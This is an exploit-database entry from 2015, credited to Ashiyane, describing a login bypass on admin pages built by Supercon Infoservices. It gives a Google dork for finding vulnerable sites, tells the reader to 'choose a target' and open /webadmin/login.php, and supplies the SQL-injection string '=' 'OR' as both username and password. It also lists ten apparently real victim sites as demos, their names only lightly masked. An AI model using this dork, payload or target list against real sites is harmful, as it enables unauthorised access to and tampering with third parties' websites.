id: 23991
date: 08/09/2015
title: Supercon Infoservices Bypass Admin Page Vulnerability
author: Ashiyane
cves: 

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title : Supercon Infoservices Bypass Admin Page Vulnerability
[+]
[+] Exploit Author : Ashiyane Digital Security Team
[+]
[+] Vendor Homepage : http://www.superconinfo.com/
[+]
[+] Google Dork : intext:"Developed By:Supercon Infoservices Pvt.Ltd."
[+]
[+] Date: 2015-08-05
[+]
[+] Tested On : Windows , Linux
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] And then choose a target and put this after url : /webadmin/login.php
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] And fill username and password like the information below :
[+]
[+] Username : '=' 'OR'
[+] Password : '=' 'OR'
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Demos :
[+]
[+] http://sXdcsm.org/webadmin/login.php
[+]
[+] http://viewopticXs.in/webadmin/login.php
[+]
[+] http://dhansiriXrestaurant.com/webadmin/login.php
[+]
[+] http://sasankXasekhar.com/webadmin/login.php
[+]
[+] http://ashraXfiatea.com/webadmin/login.php
[+]
[+] http://jcbosescieXnceheritagemuseum.org/webadmin/login.php
[+]
[+] http://bengalenginXeeringworks.com/webadmin/login.php
[+]
[+] http://lyceumstuXdycentre.com/webadmin/login.php
[+]
[+] http://citysmartXqualityexperts.com/webadmin/login.php
[+]
[+] http://northpoXintmotors.in/webadmin/login.php
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Discovered by : Cloner-47
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

#  0day.today [2023-03-26]  #